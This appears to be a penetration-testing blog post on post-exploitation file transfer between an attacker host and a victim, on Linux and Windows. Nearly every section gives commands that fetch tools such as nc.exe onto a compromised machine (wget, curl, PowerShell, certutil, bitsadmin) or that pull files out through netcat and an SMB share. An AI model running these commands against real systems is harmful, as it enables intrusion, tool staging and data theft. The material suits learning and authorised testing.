File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:

This post assumes you are running Linux as a host machine.



If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.

# Setup http server in Host machine: 
## Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## php
php -s localhost:8080

## Apache
### For this, you need to copy the file you want to transfer to the directory '/var/www/html' then enable apache service
service apache2 start
Host Setup

Now you can download the files on the target machine as follows.

wget http://<your_hosts_ip>/<file_name>
curl http://<your_hosts_ip>/<file_name> > file
curl -O http://<your_hosts_ip>/<file_name>
Download Script


If netcat is installed on the target machine, we can use it to transfer files.

# First, set up the netcat on target machine to listen for the incoming request.
nc -nvlp 8080 > file

# then send the desired file from your host machine
nc $target_ip 8080 < file
Netcat File Transfer


If you have SSH access to the target machine, you can transfer files using SCP as follows:

## Copy the file: 
scp /path/to/source/file.ext username@<target_ip>:/path/to/destination/file.ext

## Copy Directory:
scp -r /path/to/source/dir username@<target_ip>:/path/to/destination
SCP File Transfer



Even though Windows doesn't have wget, we can use other options to download files via HTTP. Some of them are:


powershell Invoke-WebRequest -Uri http://[vpnIP]:[LPORT2]/Message.exe -Outfile Message.exe

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('', '%temp%\evil.exe');

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.x/nc.exe','c:\temp\nc.exe')

powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.x/nc.exe -Destination C:\temp\nc.exe")

powershell.exe wget "http://10.10.14.x/nc.exe" -outfile "c:\temp\nc.exe"
Powershell File Transfer


certutil.exe -urlcache -split -f http://<host_ip>:<port>/file file
Certutil File Transfer


bitsadmin /transfer evil /download /priority high http://<target_ip>:<port>/file %temp%\file
Bitsadmin File Transfer


The easiest method to transfer files between Linux and Windows is SMB since it doesn't require any special configuration or commands, and SMB is built-in on every Windows machine. You can also execute any binary on SMB without needing to copy it over the target machine.

First, start an smb share on your host machine.

python3 /usr/share/doc/python3-impacket/examples/ evilshare .
Your directory containing may defer from mine depending on your impacket installation.

You can test if the SMB share is up using net view command on windows.

net view \\<host_ip>

Now you can copy files from share to the target machine using copy or move and vice versa.

## In target machine download the file using copy
copy \\ip-addr\share-name\file out-file
## to transfer file from target machine to local machine
copy file_name \\ip-addr\share-name
SMB File Transfer

or you can execute the binary directly from the share without copying



FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.

Install a python library called pyftpdlib.

sudo apt-get install python3-pyftpdlib

Start an FTP server with:

python3 -m pyftpdlib

# By default, the ftp server runs on port 2121 and accepts anonymous authentication
# you can specify the ports using -p argument
# you can also give write access to anonymous user with -w 
FTP Server Setup

If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port> and use the credentials anonymous. If you don't have an interactive shell, create a text file with the following content.

open <host_ip> <port>
binary # remove this line if the file you want to transfer is not binary
get binary_name.exe
FTP Login

Now, simply run ftp -s:filename.txt , and it will download the file you specified.


TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available (you can also enable it with pkgmgr /iu:"TFTP") on the target machine, you can start a TFTP server on your machine with:

service atftpd start

and get files from the target machine with:

tftp -i <host_ip> GET binary.exe
These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.